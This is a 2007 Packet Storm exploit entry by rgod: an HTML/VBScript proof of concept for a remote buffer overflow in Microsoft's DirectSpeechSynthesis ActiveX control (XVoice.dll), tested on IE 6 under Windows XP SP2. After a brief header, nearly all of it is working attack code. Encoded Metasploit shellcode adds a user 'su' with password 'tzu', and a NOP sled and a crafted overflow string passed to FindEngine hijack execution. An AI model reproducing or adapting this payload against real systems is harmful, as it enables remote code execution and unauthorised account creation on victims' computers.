ms-activex.txt

2007-06-14T00:00:00
ID PACKETSTORM:57177
Type packetstorm
Reporter rgod
Modified 2007-06-14T00:00:00

Description

                                        
                                            `<!--  
6.30 10/06/2007  
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512)  
/ DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512)  
remote buffer overflow exploit/ xp sp2 version  
  
both dlls are vulnerable, this is the poc for the first one  
worked regardless of boot.ini settings, remotely and  
by dragging the html file in the browser window  
tested against IE 6  
  
by A. Micalizzi (aka rgod )  
  
this is dedicated to Sara, and greetings to shinnai, a good comrade  
  
***note: this was indipendently discovered by me and Will Dormann during the  
same period, documented here:  
  
http://www.kb.cert.org/vuls/id/507433  
http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx  
  
the affected package,  
http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp  
  
is still distributed with the kill bit not set  
-->  
  
<html>  
<object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT>  
<script language='vbscript'>  
  
REM metasploit, add a user 'su' with pass 'tzu'  
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP  
  
eax= unescape("%ff%13")  
ebp= unescape("%ff%13")  
eip= unescape("%01%0a") : REM jmp to scode, UNICODE expanded  
jnk= string(50,unescape("%13"))  
  
suntzu = string(888,"A") + ebp + eip + eax + jnk  
  
bufferI = string(9999999,"X")  
bufferII = string(9999999,"Y")  
bufferIII = string(9999999,"Z")  
bufferIV = string(9999999,"O")  
  
EngineID= string(200000,"b")  
MfgName="default"  
ProductName="default"  
ModeID= string(199544,unescape("%90")) + scode  
ModeName= suntzu  
LanguageID=1  
Dialect="default"  
Speaker="default"  
Style=1  
Gender=1  
Age=1  
Features=1  
Interfaces=1  
EngineFeatures=1  
RankEngineID=1  
RankMfgName=1  
RankProductName=1  
RankModeID=1  
RankModeName=1  
RankLanguage=1  
RankDialect=1  
RankSpeaker=1  
RankStyle=1  
RankGender=1  
RankAge=1  
RankFeatures=1  
RankInterfaces=1  
RankEngineFeatures=1  
  
DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures  
  
</script>  
</html>  
`